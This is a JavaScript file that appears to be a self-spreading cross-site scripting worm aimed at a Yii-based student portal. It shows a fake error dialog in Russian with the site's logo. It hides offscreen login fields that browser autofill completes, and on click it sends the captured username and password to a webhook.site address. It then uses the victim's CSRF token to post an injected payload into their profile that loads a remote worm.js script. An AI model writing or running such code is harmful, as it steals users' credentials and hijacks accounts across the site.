var d=document.createElement('div');
d.style.cssText='position:fixed;top:0;left:0;width:100vw;height:100vh;background:rgba(0,0,0,0.7);z-index:2147483647;display:flex;align-items:center;justify-content:center';
var m=document.createElement('div');
m.style.cssText='background:#fff;border-radius:12px;padding:32px;width:320px;text-align:center;box-shadow:0 10px 30px rgba(0,0,0,0.3)';
var logo=document.createElement('img');
logo.src='/frontend/web/content/image/logoBlue.svg';
logo.style.cssText='width:120px;margin-bottom:16px';
m.appendChild(logo);
var h=document.createElement('p');
h.textContent='Возникла ошибка. Перезагрузить страницу?';
h.style.cssText='color:#125ad0;font-weight:bold;margin-bottom:24px';
m.appendChild(h);
var a=document.createElement('input');
a.autocomplete='username';
a.style.cssText='position:fixed;left:-9999px;top:0;width:1px;height:1px';
document.body.appendChild(a);
var b=document.createElement('input');
b.type='password';
b.autocomplete='current-password';
b.style.cssText='position:fixed;left:-9999px;top:0;width:1px;height:1px';
document.body.appendChild(b);
var c=document.createElement('button');
c.textContent='ОК';
c.style.cssText='width:100%;padding:12px;background:#125ad0;color:#fff;border:none;border-radius:8px;font-size:16px;font-weight:bold;cursor:pointer';
c.onclick=function(){
new Image().src='https://webhook.site/ae7990e1-69d3-4b40-8fdc-bbe39df73870?l='+encodeURIComponent(a.value)+String.fromCharCode(38)+'p='+encodeURIComponent(b.value);
var wp='%22%3E%3Cimg%20src%3Dx%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27https%3A%2F%2Fcdn.jsdelivr.net%2Fgh%2FSlednevaKristina%2FXXS%2Fworm.js%27%3Bdocument.head.appendChild%28s%29%22%3E';
fetch('/student-info/post-user-url',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:'_csrf='+encodeURIComponent(yii.getCsrfToken())+'&telegram='+wp+'&bitrix=&vk='});
document.body.removeChild(d);
};
m.appendChild(c);
d.appendChild(m);
document.body.appendChild(d);
